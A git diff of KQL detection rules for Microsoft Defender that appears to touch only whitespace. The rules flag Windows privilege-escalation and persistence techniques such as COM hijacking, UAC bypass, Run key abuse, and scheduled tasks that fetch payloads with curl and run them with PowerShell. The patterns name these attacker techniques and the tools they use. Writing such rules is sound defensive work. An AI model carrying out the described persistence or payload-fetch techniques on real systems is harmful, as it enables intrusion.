a03fbb20..821d1b96 100644 --- a/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Process Injection Via Msra.EXE -// Author: Alexander McDonald -// Date: 2022-06-24 -// Level: high -// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 -// False Positives: -// - Legitimate use of Msra.exe - -DeviceProcessEvents +// Title: Potential Process Injection Via Msra.EXE +// Author: Alexander McDonald +// Date: 2022-06-24 +// Level: high +// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Legitimate use of Msra.exe + +DeviceProcessEvents | where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql b/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql index 4fc7dbc5..ca605a3c 100644 --- a/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql +++ b/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql @@ -1,10 +1,10 @@ -// Title: Potential PSFactoryBuffer COM Hijacking -// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk -// Date: 2023-06-07 -// Level: high -// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 - -DeviceRegistryEvents +// Title: Potential PSFactoryBuffer COM Hijacking +// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk +// Date: 2023-06-07 +// Level: high +// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 + +DeviceRegistryEvents | where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql index c882c39b..51e89c61 100644 --- a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql +++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql @@ -1,12 +1,12 @@ -// Title: Potential Registry Persistence Attempt Via DbgManagedDebugger -// Author: frack113 -// Date: 2022-08-07 -// Level: medium -// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574 -// False Positives: -// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines - -DeviceRegistryEvents +// Title: Potential Registry Persistence Attempt Via DbgManagedDebugger +// Author: frack113 +// Date: 2022-08-07 +// Level: medium +// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574 +// False Positives: +// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines + +DeviceRegistryEvents | where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql index cc243a12..6c5eee3c 100644 --- a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql +++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql @@ -1,13 +1,13 @@ -// Title: Potential Registry Persistence Attempt Via Windows Telemetry -// Author: Lednyov Alexey, oscd.community, Sreeman -// Date: 2020-10-16 -// Level: high -// Description: Detects potential persistence behavior using the windows telemetry registry key. -// Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. -// This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. -// The problem is, it will run any arbitrary command without restriction of location or type. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 - -DeviceRegistryEvents +// Title: Potential Registry Persistence Attempt Via Windows Telemetry +// Author: Lednyov Alexey, oscd.community, Sreeman +// Date: 2020-10-16 +// Level: high +// Description: Detects potential persistence behavior using the windows telemetry registry key. +// Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. +// This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. +// The problem is, it will run any arbitrary command without restriction of location or type. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 + +DeviceRegistryEvents | where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController*" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql index eee75d40..925e5d2e 100644 --- a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql +++ b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql @@ -1,12 +1,12 @@ -// Title: Potential RipZip Attack on Startup Folder -// Author: Greg (rule) -// Date: 2022-07-21 -// Level: high -// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut. -// If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. -// Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 - -DeviceFileEvents +// Title: Potential RipZip Attack on Startup Folder +// Author: Greg (rule) +// Date: 2022-07-21 +// Level: high +// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut. +// If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. +// Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql b/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql index b9de7124..5f831e69 100644 --- a/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql +++ b/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql @@ -1,10 +1,10 @@ -// Title: Potential SSH Tunnel Persistence Install Using A Scheduled Task -// Author: Rory Duncan -// Date: 2025-07-14 -// Level: high -// Description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005, attack.command-and-control - -DeviceProcessEvents +// Title: Potential SSH Tunnel Persistence Install Using A Scheduled Task +// Author: Rory Duncan +// Date: 2025-07-14 +// Level: high +// Description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005, attack.command-and-control + +DeviceProcessEvents | where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "ssh.exe" and ProcessCommandLine contains "-i") or (ProcessCommandLine contains " /create " and ProcessCommandLine contains "sshd.exe" and ProcessCommandLine contains "-f")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql index eab7732d..d38c938e 100644 --- a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql @@ -1,15 +1,15 @@ -// Title: Potential Startup Shortcut Persistence Via PowerShell.EXE -// Author: Christopher Peacock '@securepeacock', SCYTHE -// Date: 2021-10-24 -// Level: high -// Description: Detects PowerShell writing startup shortcuts. -// This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. -// Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. -// In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware. - -DeviceFileEvents +// Title: Potential Startup Shortcut Persistence Via PowerShell.EXE +// Author: Christopher Peacock '@securepeacock', SCYTHE +// Date: 2021-10-24 +// Level: high +// Description: Detects PowerShell writing startup shortcuts. +// This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. +// Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. +// In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware. + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql b/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql index 291e35e0..427d3856 100644 --- a/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential UAC Bypass Via Sdclt.EXE -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: medium -// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 - -DeviceProcessEvents +// Title: Potential UAC Bypass Via Sdclt.EXE +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceProcessEvents | where FolderPath endswith "sdclt.exe" and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql b/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql index 0cee95d1..fb4dba3f 100644 --- a/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql +++ b/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql @@ -1,12 +1,12 @@ -// Title: PowerShell Web Access Feature Enabled Via DISM -// Author: Michael Haag -// Date: 2024-09-03 -// Level: high -// Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548.002 -// False Positives: -// - Legitimate PowerShell Web Access installations by administrators - -DeviceProcessEvents +// Title: PowerShell Web Access Feature Enabled Via DISM +// Author: Michael Haag +// Date: 2024-09-03 +// Level: high +// Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548.002 +// False Positives: +// - Legitimate PowerShell Web Access installations by administrators + +DeviceProcessEvents | where (ProcessCommandLine contains "WindowsPowerShellWebAccess" and ProcessCommandLine contains "/online" and ProcessCommandLine contains "/enable-feature") and (FolderPath endswith "\\dism.exe" or ProcessVersionInfoOriginalFileName =~ "DISM.EXE") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql b/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql index bb1151e7..865f2147 100644 --- a/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql +++ b/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql @@ -1,10 +1,10 @@ -// Title: Registry Persistence via Explorer Run Key -// Author: Florian Roth (Nextron Systems), oscd.community -// Date: 2018-07-18 -// Level: high -// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 - -DeviceRegistryEvents +// Title: Registry Persistence via Explorer Run Key +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2018-07-18 +// Level: high +// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents | where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql b/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql index 287d95b5..f3ffff0c 100644 --- a/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql +++ b/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql @@ -1,12 +1,12 @@ -// Title: Regsvr32 DLL Execution With Uncommon Extension -// Author: Florian Roth (Nextron Systems) -// Date: 2019-07-17 -// Level: medium -// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574, attack.execution -// False Positives: -// - Other legitimate extensions currently not in the list either from third party or specific Windows components. - -DeviceProcessEvents +// Title: Regsvr32 DLL Execution With Uncommon Extension +// Author: Florian Roth (Nextron Systems) +// Date: 2019-07-17 +// Level: medium +// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574, attack.execution +// False Positives: +// - Other legitimate extensions currently not in the list either from third party or specific Windows components. + +DeviceProcessEvents | where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql b/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql index 483594bf..484b703a 100644 --- a/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql +++ b/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Vmnat.exe Execution -// Author: elhoim -// Date: 2022-09-09 -// Level: high -// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 - -DeviceProcessEvents +// Title: Renamed Vmnat.exe Execution +// Author: elhoim +// Date: 2022-09-09 +// Level: high +// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql b/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql index dd73044f..d632a175 100644 --- a/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql +++ b/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql @@ -1,10 +1,10 @@ -// Title: Root Account Enable Via Dsenableroot -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-08-22 -// Level: medium -// Description: Detects attempts to enable the root account via "dsenableroot" -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1078, attack.t1078.001, attack.t1078.003, attack.initial-access, attack.persistence - -DeviceProcessEvents +// Title: Root Account Enable Via Dsenableroot +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-08-22 +// Level: medium +// Description: Detects attempts to enable the root account via "dsenableroot" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1078, attack.t1078.001, attack.t1078.003, attack.initial-access, attack.persistence + +DeviceProcessEvents | where FolderPath endswith "/dsenableroot" and (not(ProcessCommandLine contains " -d ")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql b/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql index f6972c12..01fdf026 100644 --- a/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql +++ b/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql @@ -1,12 +1,12 @@ -// Title: Rundll32 Registered COM Objects -// Author: frack113 -// Date: 2022-02-13 -// Level: high -// Description: load malicious registered COM objects -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Rundll32 Registered COM Objects +// Author: frack113 +// Date: 2022-02-13 +// Level: high +// Description: load malicious registered COM objects +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql b/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql index 18ddba49..60c74f99 100644 --- a/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql +++ b/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql @@ -1,13 +1,13 @@ -// Title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-21 -// Level: medium -// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 -// False Positives: -// - Benign scheduled tasks creations or executions that happen often during software installations -// - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders - -DeviceProcessEvents +// Title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-21 +// Level: medium +// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Benign scheduled tasks creations or executions that happen often during software installations +// - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders + +DeviceProcessEvents | where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Users\\All Users\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Public" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml " and ProcessCommandLine contains "\\Temp\\.CR." and ProcessCommandLine contains "\\Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or (InitiatingProcessCommandLine contains "unattended.ini" or ProcessCommandLine contains "update_task.xml") or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql index 74981cca..a66f86ff 100644 --- a/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql +++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql @@ -1,12 +1,12 @@ -// Title: Scheduled Task Creation Masquerading as System Processes -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-02-05 -// Level: high -// Description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1036.004, attack.t1036.005 -// False Positives: -// - Legitimate system administration tasks scheduling trusted system processes. - -DeviceProcessEvents +// Title: Scheduled Task Creation Masquerading as System Processes +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: high +// Description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1036.004, attack.t1036.005 +// False Positives: +// - Legitimate system administration tasks scheduling trusted system processes. + +DeviceProcessEvents | where ((ProcessCommandLine contains " audiodg" or ProcessCommandLine contains " conhost" or ProcessCommandLine contains " dwm.exe" or ProcessCommandLine contains " explorer" or ProcessCommandLine contains " lsass" or ProcessCommandLine contains " lsm" or ProcessCommandLine contains " mmc" or ProcessCommandLine contains " msiexec" or ProcessCommandLine contains " regsvr32" or ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " services" or ProcessCommandLine contains " spoolsv" or ProcessCommandLine contains " svchost" or ProcessCommandLine contains " taskeng" or ProcessCommandLine contains " taskhost" or ProcessCommandLine contains " wininit" or ProcessCommandLine contains " winlogon") and (ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ")) and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql index 66dfa068..3a32711c 100644 --- a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql +++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql @@ -1,14 +1,14 @@ -// Title: Scheduled Task Creation with Curl and PowerShell Execution Combo -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-02-05 -// Level: medium -// Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. -// This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 -// False Positives: -// - Legitimate use of schtasks for administrative purposes. -// - Automation scripts combining curl and PowerShell in controlled environments. - -DeviceProcessEvents +// Title: Scheduled Task Creation with Curl and PowerShell Execution Combo +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: medium +// Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. +// This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate use of schtasks for administrative purposes. +// - Automation scripts combining curl and PowerShell in controlled environments. + +DeviceProcessEvents | where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "powershell" \ No newline at end of file diff --git 